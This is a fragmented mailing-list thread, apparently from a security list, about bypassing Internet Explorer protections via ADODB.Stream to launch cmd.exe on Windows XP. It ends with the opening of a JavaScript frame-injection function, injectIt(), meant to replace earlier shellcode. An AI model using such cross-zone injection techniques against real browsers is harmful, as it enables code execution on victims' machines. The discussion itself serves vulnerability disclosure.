It is OK, but it causes security alert on some
machines because of "unsafe component". It isn't good
for us. But it is interesting that only on some
machines, this security alert prompted, on most winXP,
cmd.exe will run without any prompt.
What is your idea?
--- Jelmer <[EMAIL PROTECTED]> wrote:
"Matthew Murphy" wrote:
<>
> Well, the problem with ADODB.Stream wasn't executing files, it was writing
> them to disk. ...
Exactly.
ADODB.Stream is just doing what it is supposed to. The "problem" is
that code loaded from "the Internet zone" is just not supposed to be
allowed to get access
"Jelmer" writes:
> Because we avoid the adodb.stream issue all together,
> You can patch it, but if you leave open other issues, well it's pointless
> Instead we just swap in this instead of the old shellcode:
[snip PoC]
Well, the problem with ADODB.Stream wasn't executing files, it was writing
th
Because we avoid the adodb.stream issue all together,
You can patch it, but if you leave open other issues, well it's pointless
Instead we just swap in this instead of the old shellcode:
-- snip --
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected